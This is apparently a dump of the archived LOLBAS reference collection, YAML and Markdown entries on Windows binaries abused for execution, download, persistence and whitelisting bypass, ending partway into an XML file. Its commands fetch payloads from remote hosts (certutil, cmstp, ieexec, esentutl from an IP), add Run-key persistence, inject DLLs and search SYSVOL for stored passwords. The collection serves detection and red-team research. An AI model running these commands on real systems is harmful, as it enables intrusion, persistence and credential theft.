    Description: Create shortcut file.
  - Command: Nvudisp.exe KillApp calculator.exe
    Description: Kill a process.
  - Command: Nvudisp.exe Run foo
    Description: Run process
Full_Path:
  - C:\windows\system32\nvuDisp.exe
Code_Sample: []
Detection: []
Resources:
  - http://sysadminconcombre.blogspot.ca/2018/04/run-system-commands-through-nvidia.html
Acknowledgement:
  - Person: Pierre-Alexandre Braeken
    Handle: '@pabraeken'


================================================
FILE: Archive-Old-Version/LOLUtilz/OtherBinaries/Nvuhda6.yml
================================================
---
Name: Nvuhda6.exe
Description: Execute, Copy, Add registry, Create shortcut, kill process
Author: ''
Created: 2018-05-25
Commands:
  - Command: nvuhda6.exe System calc.exe
    Description: Execute calc.exe as a subprocess.
  - Command: nvuhda6.exe Copy test.txt,test-2.txt
    Description: Copy fila A to file B.
  - Command: nvuhda6.exe SetReg HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\malware=malware.exe
    Description: Add/Edit a Registry key value
  - Command: nvuhda6.exe CreateShortcut test.lnk,"Test","C:\Windows\System32\calc.exe","","C:\Windows\System32\"
    Description: Create shortcut file.
  - Command: nvuhda6.exe KillApp calc.exe
    Description: Kill a process.
  - Command: nvuhda6.exe Run foo
    Description: Run process
Full_Path:
  - Missing
Code_Sample: []
Detection: []
Resources:
  - http://www.hexacorn.com/blog/2017/11/10/reusigned-binaries-living-off-the-signed-land/
Acknowledgement:
  - Person: Adam
    Handle: '@hexacorn'


================================================
FILE: Archive-Old-Version/LOLUtilz/OtherBinaries/ROCCAT_Swarm.yml
================================================
---
Name: ROCCAT_Swarm.exe
Description: Execute
Author: ''
Created: 2018-05-25
Commands:
  - Command: Replace ROCCAT_Swarm_Monitor.exe with your binary.exe
    Description: Hijack ROCCAT_Swarm_Monitor.exe and launch payload when executing ROCCAT_Swarm.exe
Full_Path:
  - C:\Program Files (x86)\ROCCAT\ROCCAT Swarm\
Code_Sample: []
Detection: []
Resources:
  - https://twitter.com/pabraeken/status/994213164484001793
Acknowledgement:
  - Person: Pierre-Alexandre Braeken
    Handle: '@pabraeken'


================================================
FILE: Archive-Old-Version/LOLUtilz/OtherBinaries/RunCmd_X64.yml
================================================
---
Name: RunCmd_X64.exe
Description: A tool to execute a command file
Author: Bart
Created: 2019-03-17
Commands:
  - Command: RunCmd_X64 file.cmd /F
    Description: Launch command file and hide the console window
    Usecase: Run applications and scripts using Acer's RunCmd
    Category: Execute
    Privileges: User
    MitreID: T1218
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Full_Path:
- Path: C:\OEM\Preload\utility
Code_Sample:
- Code:
Detection:
- IOC: RunCmd_X64.exe spawned
Resources:
 - Link: https://bartblaze.blogspot.com/2019/03/run-applications-and-scripts-using.html
 - Link: https://twitter.com/bartblaze/status/1107390776147881984
Acknowledgement:
  - Person: Bart
    Handle: '@bartblaze'


================================================
FILE: Archive-Old-Version/LOLUtilz/OtherBinaries/Setup.yml
================================================
---
Name: Setup.exe
Description: Execute
Author: ''
Created: 2018-05-25
Commands:
  - Command: Run Setup.exe
    Description: Hijack hpbcsiServiceMarshaller.exe and run Setup.exe to launch a payload.
Full_Path:
  - C:\LJ-Ent-700-color-MFP-M775-Full-Solution-15315
Code_Sample: []
Detection: []
Resources:
  - https://twitter.com/pabraeken/status/994381620588236800
Acknowledgement:
  - Person: Pierre-Alexandre Braeken
    Handle: '@pabraeken'


================================================
FILE: Archive-Old-Version/LOLUtilz/OtherBinaries/Upload.yml
================================================
---
Name: Update.exe
Description: Binary to update the existing installed Nuget/squirrel package. Part of Whatsapp installation.
Author: 'Jesus Galvez'
Created: '2020-11-01'
Commands:
  - Command: Update.exe --processStart payload.exe --process-start-args "whatever args"
    Description: Copy your payload into "%localappdata%\Whatsapp\app-[version]\". Then run the command. Update.exe will execute the file you copied.
    Usecase: Execute binary
    Category: Execute
    Privileges: User
    MitreID: T1218
    OperatingSystem: Windows 7 and up with Whatsapp installed
Full_Path:
  - Path: '%localappdata%\Whatsapp\Update.exe'
Detection:
  - IOC: '"%localappdata%\Whatsapp\Update.exe" spawned an unknown process'


================================================
FILE: Archive-Old-Version/LOLUtilz/OtherBinaries/Usbinst.yml
================================================
---
Name: Usbinst.exe
Description: Execute
Author: ''
Created: 2018-05-25
Commands:
  - Command: Usbinst.exe InstallHinfSection "DefaultInstall 128 c:\temp\calc.inf"
    Description: Execute calc.exe through DefaultInstall Section Directive in INF file.
Full_Path:
  - C:\Program Files (x86)\Citrix\ICA Client\Drivers64\Usbinst.exe
Code_Sample: []
Detection: []
Resources:
  - https://twitter.com/pabraeken/status/993514357807108096
Acknowledgement:
  - Person: Pierre-Alexandre Braeken
    Handle: '@pabraeken'


================================================
FILE: Archive-Old-Version/LOLUtilz/OtherBinaries/VBoxDrvInst.yml
================================================
---
Name: VBoxDrvInst.exe
Description: Persistence
Author: ''
Created: 2018-05-25
Commands:
  - Command: VBoxDrvInst.exe driver executeinf c:\temp\calc.inf
    Description: Set registry key-value for persistance via INF file call through VBoxDrvInst.exe
Full_Path:
  - C:\Program Files\Oracle\VirtualBox Guest Additions
Code_Sample: []
Detection: []
Resources:
  - https://twitter.com/pabraeken/status/993497996179492864
Acknowledgement:
  - Person: Pierre-Alexandre Braeken
    Handle: '@pabraeken'


================================================
FILE: Archive-Old-Version/LOLUtilz/OtherBinaries/aswrundll.yml
================================================
Name: aswrundll.exe
Description: This process is used by AVAST antivirus to run and execute any modules
Author: Eli Salem
Created: '2019-03-19'
Commands:
  - Command: '"C:\Program Files\Avast Software\Avast\aswrundll" "C:\Users\Public\Libraries\tempsys\module.dll"'
    Description: Load and execute modules using aswrundll
    Usecase: Execute malicious modules using aswrundll.exe
    Category: Execute
    Privileges: Any
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Full_Path:
- Path: 'C:\Program Files\Avast Software\Avast\aswrundll'
Code_Sample: 
- Code: '["C:\Program Files\Avast Software\Avast\aswrundll" "C:\Users\Public\Libraries\tempsys\module.dll" "C:\Users\module.dll"]'
Resources:
 - Link: https://www.cybereason.com/blog/information-stealing-malware-targeting-brazil-full-research
Acknowledgement:
  - Person: Eli Salem 
    handle: 'https://www.linkedin.com/in/eli-salem-954728150'

================================================
FILE: Archive-Old-Version/LOLUtilz/OtherMSBinaries/Winword.yml
================================================
---
Name: winword.exe
Description: Document editor included with Microsoft Office.
Author: 'Oddvar Moe'
Created: 2018-05-25
Commands:
  - Command: winword.exe /l dllfile.dll
    Description: Launch DLL payload.
    Usecase: Execute a locally stored DLL using winword.exe.
    Category: Execute
    Privileges: User
    MitreID: T1218
    OperatingSystem: Windows
Full_Path:
  - Path: c:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
Code_Sample:
  - Code:
Detection:
  - IOC:
Resources:
  - Link: https://twitter.com/vysecurity/status/884755482707210241
  - Link: https://twitter.com/Hexacorn/status/885258886428725250
Acknowledgement:
  - Person: Vincent Yiu (cmd)
    Handle: '@@vysecurity'
  - Person: Adam (Internals)
    Handle: '@Hexacorn'


================================================
FILE: Archive-Old-Version/LOLUtilz/OtherScripts/Testxlst.yml
================================================
---
Name: testxlst.js
Description: Script included with Pywin32.
Author: 'Oddvar Moe'
Created: 2018-05-25
Commands:
  - Command: cscript testxlst.js C:\test\test.xml c:\test\test.xls c:\test\test.out
    Description: Test Jscript included in Python tool to perform XSL transform (for payload execution).
    Category: Execution
    Privileges: User
    MitreID: T1064
    OperatingSystem: Windows
  - Command: wscript testxlst.js C:\test\test.xml c:\test\test.xls c:\test\test.out
    Description: Test Jscript included in Python tool to perform XSL transform (for payload execution).
    Category: Execution
    Privileges: User
    MitreID: T1064
    OperatingSystem: Windows
Full_Path:
  - c:\python27amd64\Lib\site-packages\win32com\test\testxslt.js (Visual Studio Installation)
Code_Sample: []
Detection: []
Resources:
  - https://twitter.com/bohops/status/993314069116485632
  - https://github.com/mhammond/pywin32
Acknowledgement:
  - Person: Jimmy
    Handle: '@bohops'


================================================
FILE: Archive-Old-Version/OSBinaries/Atbroker.exe.md
================================================
## Atbroker.exe
* Functions: Execute
```

ATBroker.exe /start malware
Start a registered Assistive Technology (AT).
```
   
* Resources:   
  * http://www.hexacorn.com/blog/2016/07/22/beyond-good-ol-run-key-part-42/
   
* Full path:   
  * C:\Windows\System32\Atbroker.exe
  * C:\Windows\SysWOW64\Atbroker.exe
   
* Notes: Thanks to Adam - @hexacorn Modifications must be made to the system registry to either register or modify an existing Assistibe Technology (AT) service entry.
  
   


================================================
FILE: Archive-Old-Version/OSBinaries/Bash.exe.md
================================================
## Bash.exe
* Functions: Execute
```

bash.exe -c calc.exe
Execute calc.exe.
```
   
* Resources:   
  * 
   
* Full path:   
  * ?
   
* Notes: Thanks to ?  
   


================================================
FILE: Archive-Old-Version/OSBinaries/Bitsadmin.exe.md
================================================
## Bitsadmin.exe
* Functions: Execute, Download, Copy, Read ADS
```

bitsadmin /create 1
bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe
bitsadmin /SetNotifyCmdLine 1 c:\data\playfolder\1.txt:cmd.exe NULL
bitsadmin /RESUME 1
bitsadmin /complete 1




Create a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command, then resume and complete the job.

bitsadmin /create 1
bitsadmin /addfile 1 https://live.sysinternals.com/autoruns.exe c:\data\playfolder\autoruns.exe
bitsadmin /RESUME 1
bitsadmin /complete 1

Create a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command, then resume and complete the job.

bitsadmin /create 1 & bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe & bitsadmin /RESUME 1 & bitsadmin /Complete 1 & bitsadmin /reset
One-liner version that creates a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command, then resume and complete the job.

bitsadmin /create 1 & bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe & bitsadmin /SetNotifyCmdLine 1 c:\data\playfolder\1.txt:cmd.exe NULL & bitsadmin /RESUME 1 & bitsadmin /Reset
One-Liner version that creates a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command, then resume and complete the job.
```
   
* Resources:   
  * https://www.slideshare.net/chrisgates/windows-attacks-at-is-the-new-black-26672679 - Slide 53
  * https://www.youtube.com/watch?v=_8xJaaQlpBo
  * https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
   
* Full path:   
  * c:\Windows\System32\bitsadmin.exe
  * c:\Windows\SysWOW64\bitsadmin.exe
   
* Notes: Thanks to Rob Fuller - @mubix , Chris Gates - @carnal0wnage, Oddvar Moe - @oddvarmoe  
   


================================================
FILE: Archive-Old-Version/OSBinaries/Certutil.exe.md
================================================
## Certutil.exe
* Functions: Download, Add ADS, Decode, Encode
```

certutil.exe -urlcache -split -f http://7-zip.org/a/7z1604-x64.exe 7zip.exe
Download and save 7zip to disk in the current folder.

certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt
Download and save a PS1 file to an Alternate Data Stream (ADS).

certutil -encode inputFileName encodedOutputFileName
certutil -decode encodedInputFileName decodedOutputFileName

Commands to encode and decode a file using Base64.
```
   
* Resources:   
  * https://twitter.com/Moriarty_Meng/status/984380793383370752
  * https://twitter.com/mattifestation/status/620107926288515072
   
* Full path:   
  * c:\windows\system32\certutil.exe
  * c:\windows\sysWOW64\certutil.exe
   
* Notes: Thanks to Matt Graeber - @mattifestation, Moriarty - @Moriarty2016  
   


================================================
FILE: Archive-Old-Version/OSBinaries/Cmdkey.exe.md
================================================
## Cmdkey.exe
* Functions: Credentials
```

cmdkey /list
List cached credentials.
```
   
* Resources:   
  * https://www.peew.pw/blog/2017/11/26/exploring-cmdkey-an-edge-case-for-privilege-escalation
   
* Full path:   
  * c:\windows\system32\cmdkey.exe
  * c:\windows\sysWOW64\cmdkey.exe
   
* Notes:   
   


================================================
FILE: Archive-Old-Version/OSBinaries/Cmstp.exe.md
================================================
## Cmstp.exe
* Functions: Execute, UACBypass
```

cmstp.exe /ni /s c:\cmstp\CorpVPN.inf
Silently installs a specially formatted local .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll.

cmstp.exe /ni /s https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Cmstp.inf
Silently installs a specially formatted remote .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll.
```
   
* Resources:   
  * https://twitter.com/NickTyrer/status/958450014111633408
  * https://gist.github.com/NickTyrer/bbd10d20a5bb78f64a9d13f399ea0f80
  * https://gist.github.com/api0cradle/cf36fd40fa991c3a6f7755d1810cc61e
  * https://oddvar.moe/2017/08/15/research-on-cmstp-exe/
  * https://gist.githubusercontent.com/tylerapplebaum/ae8cb38ed8314518d95b2e32a6f0d3f1/raw/3127ba7453a6f6d294cd422386cae1a5a2791d71/UACBypassCMSTP.ps1 (UAC Bypass)
  * https://github.com/hfiref0x/UACME
   
* Full path:   
  * C:\Windows\system32\cmstp.exe
  * C:\Windows\sysWOW64\cmstp.exe
   
* Notes: Thanks to Oddvar Moe - @oddvarmoe, Nick Tyrer - @NickTyrer  
   


================================================
FILE: Archive-Old-Version/OSBinaries/Control.exe.md
================================================
## Control.exe
* Functions: Execute, Read ADS
```

control.exe c:\windows\tasks\file.txt:evil.dll
Execute evil.dll which is stored in an Alternate Data Stream (ADS).
```
   
* Resources:   
  * https://pentestlab.blog/2017/05/24/applocker-bypass-control-panel/
  * https://www.contextis.com/resources/blog/applocker-bypass-registry-key-manipulation/
  * https://bohops.com/2018/01/23/loading-alternate-data-stream-ads-dll-cpl-binaries-to-bypass-applocker/
  * https://twitter.com/bohops/status/955659561008017409
   
* Full path:   
  * C:\Windows\system32\control.exe    
  * C:\Windows\sysWOW64\control.exe     
   
* Notes: Thanks to Jimmy - @bohops  
   

================================================
FILE: Archive-Old-Version/OSBinaries/Csc.exe.md
================================================
## Csc.exe
* Functions: Compile
```

csc -out:My.exe File.cs
Use CSC.EXE to compile C# code stored in File.cs and output the compiled version to My.exe.

csc -target:library File.cs

```
   
* Resources:   
  * https://docs.microsoft.com/en-us/dotnet/csharp/language-reference/compiler-options/command-line-building-with-csc-exe
  * 
   
* Full path:   
  * C:\Windows\Microsoft.NET\Framework\v4.0.30319\Csc.exe
  * C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Csc.exe
   
* Notes: Thanks to ?  
   

================================================
FILE: Archive-Old-Version/OSBinaries/Cscript.exe.md
================================================
## Cscript.exe
* Functions: Execute, Read ADS
```

cscript c:\ads\file.txt:script.vbs
Use cscript.exe to exectute a Visual Basic script stored in an Alternate Data Stream (ADS).
```
   
* Resources:   
  * https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
  * https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/
   
* Full path:   
  * c:\windows\system32\cscript.exe
  * c:\windows\sysWOW64\cscript.exe
   
* Notes: Thanks to Oddvar Moe - @oddvarmoe  
   

================================================
FILE: Archive-Old-Version/OSBinaries/Dfsvc.exe.md
================================================
## Dfsvc.exe
* Functions: Execute
```

Missing Example

```
   
* Resources:   
  * https://github.com/api0cradle/ShmooCon-2015/blob/master/ShmooCon-2015-Simple-WLEvasion.pdf
   
* Full path:   
  * C:\Windows\Microsoft.NET\Framework\v2.0.50727\Dfsvc.exe     
  * C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Dfsvc.exe    
  * C:\Windows\Microsoft.NET\Framework\v4.0.30319\Dfsvc.exe    
  * C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Dfsvc.exe    
   
* Notes: Thanks to Casey Smith - @subtee  
   


================================================
FILE: Archive-Old-Version/OSBinaries/Diskshadow.exe.md
================================================
## Diskshadow.exe
* Functions: Execute, Dump NTDS.dit
```

diskshadow.exe /s c:\test\diskshadow.txt
Execute commands using diskshadow.exe from a prepared diskshadow script.

diskshadow> exec calc.exe
Execute a calc.exe using diskshadow.exe.
```
   
* Resources:   
  * https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/
   
* Full path:   
  * c:\windows\system32\diskshadow.exe
  * c:\windows\sysWOW64\diskshadow.exe
   
* Notes: Thanks to Jimmy - @bohops  
   


================================================
FILE: Archive-Old-Version/OSBinaries/Dnscmd.exe.md
================================================
## Dnscmd.exe
* Functions: Execute
```

dnscmd.exe dc1.lab.int /config /serverlevelplugindll \\192.168.0.149\dll\wtf.dll
Adds a specially crafted DLL as a plug-in of the DNS Service.
```
   
* Resources:   
  * https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83
  * https://blog.3or.de/hunting-dns-server-level-plugin-dll-injection.html
  * https://github.com/dim0x69/dns-exe-persistance/tree/master/dns-plugindll-vcpp
  * https://twitter.com/Hexacorn/status/994000792628719618
  * http://www.labofapenetrationtester.com/2017/05/abusing-dnsadmins-privilege-for-escalation-in-active-directory.html
   
* Full path:   
  * c:\windows\system32\Dnscmd.exe
  * c:\windows\sysWOW64\Dnscmd.exe
   
* Notes: This command must be run on a DC by a user that is at least a member of the DnsAdmins group. See the refference links for DLL details.
Thanks to Shay Ber - ?,
Dimitrios Slamaris - @dim0x69,
Nikhil SamratAshok,
Mittal - @nikhil_mitt
  
   


================================================
FILE: Archive-Old-Version/OSBinaries/Esentutl.exe.md
================================================
## Esentutl.exe
* Functions: Copy, Download, Write ADS, Read ADS
```

esentutl.exe /y C:\folder\sourcefile.vbs /d C:\folder\destfile.vbs /o
Copies the source VBS file to the destination VBS file.

esentutl.exe /y C:\ADS\file.exe /d c:\ADS\file.txt:file.exe /o
Copies the source EXE to an Alternate Data Stream (ADS) of the destination file.

esentutl.exe /y C:\ADS\file.txt:file.exe /d c:\ADS\file.exe /o
Copies the source Alternate Data Stream (ADS) to the destination EXE.

esentutl.exe /y \\82.221.113.85\webdav\file.exe /d c:\ADS\file.txt:file.exe /o
Copies the source EXE to the destination Alternate Data Stream (ADS) of the destination file.

esentutl.exe /y \\82.221.113.85\webdav\file.exe /d c:\ADS\file.exe /o
Copies the source EXE to the destination EXE file.

esentutl.exe /y \\live.sysinternals.com\tools\adrestore.exe /d \\otherwebdavserver\webdav\adrestore.exe /o
Copies the source EXE to the destination EXE file
```
   
* Resources:   
  * https://twitter.com/egre55/status/985994639202283520
   
* Full path:   
  * c:\windows\system32\esentutl.exe
  * c:\windows\sysWOW64\esentutl.exe
   
* Notes: Thanks to egre55 - @egre55  
   


================================================
FILE: Archive-Old-Version/OSBinaries/Expand.exe.md
================================================
## Expand.exe
* Functions: Download, Copy, Add ADS
```

expand \\webdav\folder\file.bat c:\ADS\file.bat
Copies source file to destination.

expand c:\ADS\file1.bat c:\ADS\file2.bat
Copies source file to destination.

expand \\webdav\folder\file.bat c:\ADS\file.txt:file.bat
Copies source file to destination Alternate Data Stream (ADS).
```
   
* Resources:   
  * https://twitter.com/infosecn1nja/status/986628482858807297
  * https://twitter.com/Oddvarmoe/status/986709068759949319
   
* Full path:   
  * c:\windows\system32\Expand.exe
  * c:\windows\sysWOW64\Expand.exe
   
* Notes: Thanks to Rahmat Nurfauzi - @infosecn1nja, Oddvar Moe - @oddvarmoe  
   


================================================
FILE: Archive-Old-Version/OSBinaries/Explorer.exe.md
================================================
## Explorer.exe
* Functions: Execute
```

explorer.exe calc.exe
Executes calc.exe as a subprocess of explorer.exe.
```
   
* Resources:   
  * https://twitter.com/bohops/status/986984122563391488
   
* Full path:   
  * c:\windows\explorer.exe
  * c:\windows\sysWOW64\explorer.exe
   
* Notes: Thanks to Jimmy - @bohops  
   


================================================
FILE: Archive-Old-Version/OSBinaries/Extexport.exe.md
================================================
## Extexport.exe
* Functions: Execute
```

Extexport.exe c:\test foo bar
Load a DLL located in the c:\\test folder with one of the following names: mozcrt19.dll, mozsqlite3.dll, or sqlite.dll
```
   
* Resources:   
  * http://www.hexacorn.com/blog/2018/04/24/extexport-yet-another-lolbin/
   
* Full path:   
  * C:\Program Files\Internet Explorer\Extexport.exe    
  * C:\Program Files\Internet Explorer(x86)\Extexport.exe
   
* Notes: Thanks to Adam - @hexacorn  
   


================================================
FILE: Archive-Old-Version/OSBinaries/Extrac32.exe.md
================================================
## Extrac32.exe
* Functions: Add ADS, Download
```

extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe
Extracts the source CAB file into an Alternate Data Stream (ADS) of the target file.

extrac32 \\webdavserver\webdav\file.cab c:\ADS\file.txt:file.exe
Extracts the source CAB file into an Alternate Data Stream (ADS) of the target file.

extrac32 /Y /C \\webdavserver\share\test.txt C:\folder\test.txt
Copy the source file to the destination file and overwrite it.
```
   
* Resources:   
  * https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/
  * https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
  * https://twitter.com/egre55/status/985994639202283520
   
* Full path:   
  * c:\windows\system32\extrac32.exe
  * c:\windows\sysWOW64\extrac32.exe
   
* Notes: Thanks to Oddvar Moe - @oddvarmoe, egre55 - @egre55  
   


================================================
FILE: Archive-Old-Version/OSBinaries/Findstr.exe.md
================================================
## Findstr.exe
* Functions: Add ADS, Search
```

findstr /V /L W3AllLov3DonaldTrump c:\ADS\file.exe > c:\ADS\file.txt:file.exe
Searches for the string W3AllLov3DonaldTrump, since it does not exist (/V) file.exe is written to an Alternate Data Stream (ADS) of the file.txt file.

findstr /V /L W3AllLov3DonaldTrump \\webdavserver\folder\file.exe > c:\ADS\file.txt:file.exe
Searches for the string W3AllLov3DonaldTrump, since it does not exist (/V) file.exe is written to an Alternate Data Stream (ADS) of the file.txt file.

findstr /S /I cpassword \\<FQDN>\sysvol\<FQDN>\policies\*.xml
Search for stored password in Group Policy files stored on SYSVOL.
```
   
* Resources:   
  * https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/
  * https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
   
* Full path:   
  * c:\windows\system32\findstr.exe
  * c:\windows\sysWOW64\findstr.exe
   
* Notes: Thanks to Oddvar Moe - @oddvarmoe  
   


================================================
FILE: Archive-Old-Version/OSBinaries/Forfiles.exe.md
================================================
## Forfiles.exe
* Functions: Execute, Read ADS
```

forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe
Executes calc.exe since there is a match for notepad.exe in the c:\\windows\\System32 folder.

forfiles /p c:\windows\system32 /m notepad.exe /c "c:\folder\normal.dll:evil.exe"
Executes the evil.exe Alternate Data Stream (AD) since there is a match for notepad.exe in the c:\\windows\\system32 folder.
```
   
* Resources:   
  * https://twitter.com/vector_sec/status/896049052642533376
  * https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
  * https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/
   
* Full path:   
  * C:\Windows\system32\forfiles.exe
  * C:\Windows\sysWOW64\forfiles.exe
   
* Notes: Thanks to Eric - @vector_sec, Oddvar Moe - @oddvarmoe  
   


================================================
FILE: Archive-Old-Version/OSBinaries/Gpscript.exe.md
================================================
## Gpscript.exe
* Functions: Execute
```

Gpscript /logon
Executes logon scripts configured in Group Policy.

Gpscript /startup
Executes startup scripts configured in Group Policy.
```
   
* Resources:   
  * https://oddvar.moe/2018/04/27/gpscript-exe-another-lolbin-to-the-list/
   
* Full path:   
  * c:\windows\system32\gpscript.exe
  * c:\windows\sysWOW64\gpscript.exe
   
* Notes: Thanks to Oddvar Moe - @oddvarmoe
Requires administrative rights and modifications to local group policy settings.
  
   


================================================
FILE: Archive-Old-Version/OSBinaries/IEExec.exe.md
================================================
## IEExec.exe
* Functions: Execute
```

ieexec.exe http://x.x.x.x:8080/bypass.exe
Executes bypass.exe from the remote server.
```
   
* Resources:   
  * https://room362.com/post/2014/2014-01-16-application-whitelist-bypass-using-ieexec-dot-exe/
   
* Full path:   
  * c:\windows\system32\ieexec.exe
  * c:\windows\sysWOW64\ieexec.exe
   
* Notes: Thanks to Casey Smith - @subtee  
   


================================================
FILE: Archive-Old-Version/OSBinaries/Ie4unit.exe.md
================================================
## Ie4unit.exe
* Functions: Execute
```

ie4unit.exe -BaseSettings
Executes commands from a specially prepared ie4uinit.inf file.
```
   
* Resources:   
  * https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/
   
* Full path:   
  * c:\windows\system32\ie4unit.exe    
  * c:\windows\sysWOW64\ie4unit.exe    
  * c:\windows\system32\ieuinit.inf    
  * c:\windows\sysWOW64\ieuinit.inf    
   
* Notes: Thanks to Jimmy - @bohops  
   


================================================
FILE: Archive-Old-Version/OSBinaries/InfDefaultInstall.exe.md
================================================
## InfDefaultInstall.exe
* Functions: Execute
```

InfDefaultInstall.exe Infdefaultinstall.inf
Executes SCT script using scrobj.dll from a command in entered into a specially prepared INF file.
```
   
* Resources:   
  * https://twitter.com/KyleHanslovan/status/911997635455852544
  * https://gist.github.com/KyleHanslovan/5e0f00d331984c1fb5be32c40f3b265a
  * https://blog.conscioushacker.io/index.php/2017/10/25/evading-microsofts-autoruns/
   
* Full path:   
  * c:\windows\system32\Infdefaultinstall.exe
  * c:\windows\sysWOW64\Infdefaultinstall.exe
   
* Notes: Thanks to Kyle Hanslovan - @kylehanslovan  
   


================================================
FILE: Archive-Old-Version/OSBinaries/InstallUtil.exe.md
================================================
## InstallUtil.exe
* Functions: Execute
```

InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll
Execute the target .NET DLL or EXE.
```
   
* Resources:   
  * https://pentestlab.blog/2017/05/08/applocker-bypass-installutil/
  * https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_12
  * http://subt0x10.blogspot.no/2017/09/banned-file-execution-via.html
  * https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/InstallUtil.md
  * https://www.blackhillsinfosec.com/powershell-without-powershell-how-to-bypass-application-whitelisting-environment-restrictions-av/
  * https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
   
* Full path:   
  * C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe
  * C:\Windows\Microsoft.NET\Framework64\v2.0.50727\InstallUtil.exe
  * C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
  * C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
   
* Notes: Thanks to Casey Smith - @subtee  
   


================================================
FILE: Archive-Old-Version/OSBinaries/Makecab.exe.md
================================================
## Makecab.exe
* Functions: Package, Add ADS, Download
```

makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab
Compresses the target file into a CAB file stored in the Alternate Data Stream (ADS) of the target file.

makecab \\webdavserver\webdav\file.exe C:\Folder\file.cab
Compresses the target file and stores it in the target file.

makecab \\webdavserver\webdav\file.exe C:\Folder\file.txt:file.cab
Compresses the target file into a CAB file stored in the Alternate Data Stream (ADS) of the target file.
```
   
* Resources:   
  * https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
   
* Full path:   
  * c:\windows\system32\makecab.exe
  * c:\windows\sysWOW64\makecab.exe
   
* Notes: Thanks to Oddvar Moe - @oddvarmoe  
   


================================================
FILE: Archive-Old-Version/OSBinaries/Mavinject.exe.md
================================================
## Mavinject.exe
* Functions: Execute, Read ADS
```

MavInject.exe 3110 /INJECTRUNNING c:\folder\evil.dll
Inject evil.dll into a process with PID 3110.

Mavinject.exe 4172 /INJECTRUNNING "c:\ads\file.txt:file.dll"
Inject file.dll stored as an Alternate Data Stream (ADS) into a process with PID 4172.
```
   
* Resources:   
  * https://twitter.com/gN3mes1s/status/941315826107510784
  * https://twitter.com/Hexcorn/status/776122138063409152
  * https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/
   
* Full path:   
  * C:\Windows\System32\mavinject.exe
  * C:\Windows\SysWOW64\mavinject.exe
   
* Notes: Thanks to Giuseppe N3mes1s - @gN3mes1s, Adam - @hexacorn, Oddvar Moe - @oddvarmoe  
   


================================================
FILE: Archive-Old-Version/OSBinaries/Microsoft.Wrokflow.Compiler.xml
================================================
<?xml version="1.0" encoding="utf-8"?>
<CompilerInput xmlns:i="http://www.w3.org/2001/XMLSchema-instance" xmlns="http://schemas.datacontract.org/2004/07/Microsoft.Workflow.Compiler">
<files xmlns:d2p1="http://schemas.microsoft.com/2003/10/Serialization/Arrays">
<d2p1:string>Microsoft.Workflow.Compiler.xoml</d2p1:string>
</files>
<parameters xmlns:d2p1="http://schemas.datacontract.org/2004/07/System.Workflow.ComponentModel.Compiler">
<assemblyNames xmlns:d3p1="http://schemas.microsoft.com/2003/10/Serialization/Arrays" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" />
<compilerOptions i:nil="true" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" />
<coreAssemblyFileName xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler"></coreAssemblyFileName>
<embeddedResources xmlns:d3p1="http://schemas.microsoft.com/2003/10/Serialization/Arrays" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" />
<evidence xmlns:d3p1="http://schemas.datacontract.org/2004/07/System.Security.Policy" i:nil="true" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" />
<generateExecutable xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler">false</generateExecutable>
